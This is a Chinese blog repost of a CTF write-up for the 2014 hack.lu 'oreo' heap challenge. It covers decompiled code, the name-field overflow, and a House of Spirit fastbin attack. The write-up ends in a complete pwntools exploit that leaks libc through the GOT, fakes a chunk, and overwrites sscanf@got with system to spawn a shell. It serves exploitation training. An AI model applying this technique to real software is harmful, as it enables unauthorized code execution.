2014 hack.lu——oreo

最新推荐文章于 2024-11-13 11:16:46 发布
最新推荐文章于 2024-11-13 11:16:46 发布
阅读量254 收藏
点赞数
文章标签: shell
原文链接:http://www.cnblogs.com/pfcode/p/10735363.html
版权

32位程序,没开PIE   #House Of Spirit 

需要注意的是,该程序并没有进行 setvbuf 操作,因此在初次执行 io 函数时,会在堆上分配空间。

程序逻辑

 

 1 unsigned int sub_804898D()
 2 {
 3   unsigned int v1; // [esp+1Ch] [ebp-Ch]
 4 
 5   v1 = __readgsdword(0x14u);
 6   puts("What would you like to do?\n");
 7   printf("%u. Add new rifle\n", 1);
 8   printf("%u. Show added rifles\n", 2);
 9   printf("%u. Order selected rifles\n", 3);
10   printf("%u. Leave a Message with your Order\n", 4);
11   printf("%u. Show current stats\n", 5);
12   printf("%u. Exit!\n", 6);
13   while ( 1 )
14   {
15     switch ( sub_8048896() )
16     {
17       case 1:
18         add_new();
19         break;
20       case 2:
21         show_add();
22         break;
23       case 3:
24         order();
25         break;
26       case 4:
27         lea_msg();
28         break;
29       case 5:
30         show_status();
31         break;
32       case 6:
33         return __readgsdword(0x14u) ^ v1;
34       default:
35         continue;
36     }
37   }
38 }

 

这是一个枪支订购系统,添加枪支模块如下

 1 unsigned int add_new()
 2 {
 3   char *v1; // [esp+18h] [ebp-10h]
 4   unsigned int v2; // [esp+1Ch] [ebp-Ch]
 5 
 6   v2 = __readgsdword(0x14u);
 7   v1 = dword_804A288;
 8   dword_804A288 = (char *)malloc(0x38u);
 9   if ( dword_804A288 )
10   {
11     *((_DWORD *)dword_804A288 + 13) = v1;
12     printf("Rifle name: ");
13     fgets(dword_804A288 + 25, 56, stdin);  //溢出可以覆盖next指针
14     sub_80485EC(dword_804A288 + 25);
15     printf("Rifle description: ");
16     fgets(dword_804A288, 56, stdin);
17     sub_80485EC(dword_804A288);
18     ++dword_804A2A4;
19   }
20   else
21   {
22     puts("Something terrible happened!");
23   }
24   return __readgsdword(0x14u) ^ v2;
25 }

我们可以看出如下结构体

1 00000000 rifle           struc ; (sizeof=0x38, mappedto_5)
2 00000000 descript        db 25 dup(?)
3 00000019 name            db 27 dup(?)
4 00000034 next            dd ?                    ; offset
5 00000038 rifle           ends

问题在于读取的名字的长度过长,可以覆盖 next 指针以及后面堆块的数据。输入27+4字节即覆盖next指针。需要注意的是,这些枪支的大小都是在 fastbin 范围内的。

利用思路

 

基本利用思路如下

 

  1. 由于程序存在堆溢出漏洞,而且还可以控制 next 指针,我们可以直接控制 next 指针指向程序中 got 表的位置。当进行展示的时候,即可以输出对应的内容,这里同时需要确保假设对应地址为一个枪支结构体时,其 next 指针为 NULL。这里我采用 puts@got。通过这样的操作,我们就可以获得出 libc 基地址,以及 system 函数地址。
  2. 由于枪支结构体大小是 0x38 大小,所以其对应的 chunk 为 0x40。这里采用 house of sprit 的技术来返回 0x0804A2A8 处的 chunk,即留下的消息的指针。因此,我们需要设置 0x0804A2A4 处的内容为 0x40,即需要添加 0x40 支枪支,从而绕过大小检测。同时为了确保可以绕过 next chunk 的检测,这里我们编辑留下的消息。
  3. 在成功分配这样的 chunk 后,我们其实就有了一个任意地址修改的漏洞,这里我们可以选择修改一个合适的 got 项为 system 地址,从而获得 shell。

 

expolit

 

 1 from pwn import *
 2 sh=process('./oreo')
 3 elf=ELF('./oreo')
 4 libc=ELF('/lib/i386-linux-gnu/libc.so.6')
 5 
 6 def add(des,name):
 7     sh.sendline('1')
 8     sh.sendline(name)
 9     sh.sendline(des)
10 
11 def show_rifle():
12     sh.sendline('2')
13 
14 def order():
15     sh.sendline('3')
16 
17 def msg(notice):
18     sh.sendline('4')
19     sh.sendline(notice)
20 
21 puts_got=elf.got['puts']
22 sscanf_got=elf.got['__isoc99_sscanf']
23 
24 payload='a'*27+p32(puts_got)
25 add('a'*25,payload)
26 show_rifle()
27 sh.recvuntil('a'*25)
28 sh.recvuntil('Description: ')
29 puts_adr=u32(sh.recvuntil('\n',drop=True)[:4])
30 libc_base=puts_adr-libc.symbols['puts']
31 system_adr=libc_base+libc.symbols['system']
32 binsh_adr=libc_base+libc.search('/bin/sh').next()
33 print 'libc_base:'+hex(libc_base)
34 print 'puts_adr:'+hex(puts_adr)
35 print 'system_adr'+hex(system_adr)
36 print 'binsh_adr'+hex(binsh_adr)
37 
38 oifle=1
39 while oifle<0x3f:
40     add('a'*25,'a'*27+p32(0))
41     oifle+=1
42 
43 payload='a'*27+p32(0x0804A2A8)
44 add('a'*25,payload)
45 
46 payload='\x00'*0x20   
  #msg地址为0x0804A2C0   
  #0x0804A2C0-0x0804A2A8=0x18    
  #0x18+0x20+0x4+0x4=0x40 
47 payload+=p32(0x40)  #伪造下个堆的prev_size绕过检测
48 payload+=p32(0x20)
49 msg(payload)
50 #v40->next=chunk_0x0804A2A8
51 #free(v40) -> free(chunk_0x0804A2A8)
52 #fastbin 0x40: head->chunk_0x0804A2A8->v40->NULL
53 order()
54 sh.recvuntil('Okay order submitted!\n')
55 add(p32(sscanf_got),'a') #0x0804A2A8内容修改为sscanf_got
56 msg(p32(system_adr))  #修改0x0804A2A8处指针的内容,即修改sscanf_got的内容为system_adr
57 sh.sendline('/bin/sh\x00')
58 sh.interactive()

 

转载于:https://www.cnblogs.com/pfcode/p/10735363.html

aaa15893831716
关注
两种 fastbin attack 方法做 2014 hack.lu oreo
哒君的博客
07-31 666
终于第一次自己独立做出一道完整的堆题 方法一: ctf-wiki 很详细,不多赘述 方法二: 与 ctf-wiki 的思路类似,最终也是控制message的指针来达到任意地址写的目的 但是此处用的是 Arbitrary Alloc ,即控制fastbin块的fd指针来达成目的 具体请看exp的注释 exp: from pwn import * from LibcSearcher import ...
CTF PWN Fastbin堆溢出入门
liucc09的博客
12-12 624
目标程序及EXP下载 解题思路 添加新武器时会在偏移52个字节的地方存下上一个武器的内存地址如下: *((_DWORD *)dword_804A288 + 13) = v1; //13个DWORD就是13*4=52字节 输入武器名时存在溢出,因此可以覆盖这个地址,指向另一片内存; 提交订单时会通过单向链表的方式free各个武器的内存区域,由于第1步中可以修改武器链表的上一个武器内存地址,因此可以释放一个我们指定的内存到fastbin中; 我们指定的内存肯定得是我们可以控制的内存,例如程序中的mess
2014 hack.lu oreo
coco的博客
11-25 451
程序分析 这是一个经典的菜单程序 checksec add函数 建立了一个rifle结构体。 struct rifle { description //从0字节开始 name //从25字节开始 pre_rifle_ptr //从52字节开始 } //总共56字节 并且注意到description和name都能读入56个字节,也就是说pre_rifle_ptr是能被完全控制的。 并且有一...
2014 hack.lu oreo house of sprit
m0_57754423的博客
02-14 250
什么是house of spirit? 简单说一下我自己的理解,详细的可以看wiki。 其核心在于在一个任意可写或间接可写的位置伪造一个fake_chunk,然后通过释放该fake_chunk,即可将该fake_chunk连入fastbin中,通过malloc达到分配指定地址chunk的目的。 看道例题:2014 hack.lu oreo 漏洞点:存在堆溢出,chunk未完全free 利用思路: 1.泄露libc: add一个chunk,并且将该chunk的第13个地址位改为任意函数的g
House Of Spirit 2014 hack.lu oreo
Grxer的博客
03-21 215
我们申请只能在add函数里面malloc(0x38),也就是说size必须控制为0x38+0x8来申请,这样我们申请0x40个chunk,再控制最后一个next指针指向0804A2A8,这个伪造chunk next域必须为空,防止free chunk->next,这里是往0804A2A8里面的地址0804A2c0去写数据。这里我们可以控制next,可以free(next),可以修改notice,而且notice指针上面就可以控制size大小,天生的伪造,再申请控制0804A2A8。这里需要绕过一些检测。
house_of_spirit && 2014_hack.lu_oreo例题分析
Pwnpanda的博客
08-13 1274
2014_hack.lu_oreo 相关知识点: Fastbin Attack – House of Spirit 相关链接: 2014_hack.lu_oreo下载 CTF Wiki Fastbin Attack IDA创建结构体 题目分析: 先分析功能: ①添加枪支(add),这个地方会读取枪支的名字和描述,这是第一个难点,这个里面存在一个结构体(差点被坑死在这,为...
dotOS 2.x - O:dotOS 2.xa 基于android oreo的快速、独特且美观的rom-开源
07-08
dotOS 是一个自定义 Android 固件,它基于 Android Oreo(8.0 或 8.1)操作系统。"快速、独特且美观的 rom" 描述了 dotOS 的主要特点,即优化的性能、独特的设计以及良好的视觉体验。 **描述详解:** "Droid On ...
2022全新Oreo支付系统平台开源版源码
05-18
OREO支付系统是一个安全、可靠、专业、强大的免签约支付接口系统源码,采用了群集服务器,不仅防御高,故障率也相对来说低很多,资金平均停留的时间不超过12小时,所以您的资金安全 集合了微信官方+支付宝官方+易...
Oreo支付系统.rar
02-25
8. `oreo.png`:可能是支付系统的logo或品牌图像。 9. `install`:这个文件夹可能包含了安装程序,指导用户如何配置和安装Oreo支付系统,包括数据库连接设置、密钥生成等步骤。 10. `SDK`:软件开发工具包,通常是...
Oreo
04-01
标题中的“Oreo”可能指的是Android操作系统的8.0版本,代号为“奥利奥”。这个版本在2017年发布,引入了一系列新功能和改进,旨在提高设备性能和用户体验。HTML标签则提示我们可能涉及的是网页开发或者与前端技术...
House_Of_Spirit ctf oreo程序分析
weixin_30551963的博客
07-02 188
oreo程序下载 提取码:t4xx 程序分析 int __cdecl main() { leave_add = 0; leave_del = 0; leave_buf = (char *)&unk_804A2C0; ... ... menu(); return 0; } main函数中先赋值了三个全局变量,这三个变量在.bss段是连续的 在这个程序中,...
unlink 2014 HITCON stkof
九层台
08-03 618
这里有一个很坑的问题,ubuntu18和之前的版本堆的管理策略好像不太一样网上说的关于堆的策略的问题可能对ubuntu18有些不太适用。 所以环境就从原本的18改为了16 关于unlink的介绍参考https://ctf-wiki.github.io/ctf-wiki/pwn/heap/unlink/ http://yunnigu.dropsec.xyz/2017/04/05/%E5%A0%...
Baby PHP - hacklu CTF 2018
stepone4ward的博客
07-13 757
代码审计
pwn(究极入门)
热门推荐
sjt670994562的博客
08-01 1万+
不能说是逆向转pwn吧,主要是想拓展一下,这两者之间的关系也挺大的 1.攻防世界-when_did_you_born 除去连上就有flag,这个应该就是最简单的题目了吧 惯例,checksec,这里有四种保护机制,有大佬的链接,这个要弄很清楚,尤其是PIE,以后慢慢来吧 https://www.jianshu.com/p/8a9ef7205632 没有PIE和FORTIFY(这边作者也不是太懂,...
pwn 堆入门之fastbin attack
清霂的博客
04-02 342
目录floworeo b站原本有一个对堆基础讲的挺好的,好像叫pwn术进阶的堆溢出,但刚刚去看已经没了,好家伙,还好我刚看完,哈哈哈。 flow 涅普计划-ctf入门课堆溢出 #!/usr/bin/env python2 from pwn import * context(os="linux", arch="amd64", log_level="debug") #libc libc=ELF("libc.so.6") malloc_libc=libc.symbols['__malloc_hook'] m
pwnable.tw-calc详解
qq_35661990的博客
01-06 956
重点需要的知识:ROP链的构造、栈中ebp和esp的变换 这题颠覆了我原本以为pwn都是各种套路的思想,和pwn只需要关注危险函数的思想,栈溢出并不是只有各种ret技术,恐怕堆溢出也不仅仅局限于各种heap of技术,那些只是基础。 int __cdecl main(int argc, const char **argv, const char **envp) { ssignal(14,...
xctf攻防世界——hacknote
05-09 332
32位程序,未开PIE  #use after free #system("xxxx||sh") 程序逻辑 1 void __cdecl __noreturn main() 2 { 3 int choice; // eax 4 char buf; // [esp+8h] [ebp-10h] 5 unsigned int v2; // [esp+...
Electron 项目启动外部可执行文件的几种方式
梵心白莲的博客
11-12 612
本文介绍了在 Electron 项目中使用不同的方法来启动外部可执行文件。使用启动外部可执行文件:适用于需要异步启动子进程并处理标准输入、输出和错误流的情况。使用启动外部可执行文件:适用于执行简单的命令行操作,并等待命令执行完毕后返回结果。使用或启动外部可执行文件:适用于不需要与外部进程进行交互的情况。使用启动外部 Node.js 脚本:适用于启动新的 Node.js 进程并进行进程间通信。
IC脚本之shell
最新发布
xusong666的博客
11-13 145
3. test表达式。
genymotion-arm-translation-oreo-8.0.zip下载
12-10
genymotion-arm-translation-oreo-8.0.zip是一个用于Genymotion模拟器的ARM翻译文件,适用于安卓8.0版本(代号为Oreo)的系统。这个翻译文件的作用是在Genymotion模拟器中支持安卓8.0系统的ARM架构。 想要下载...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值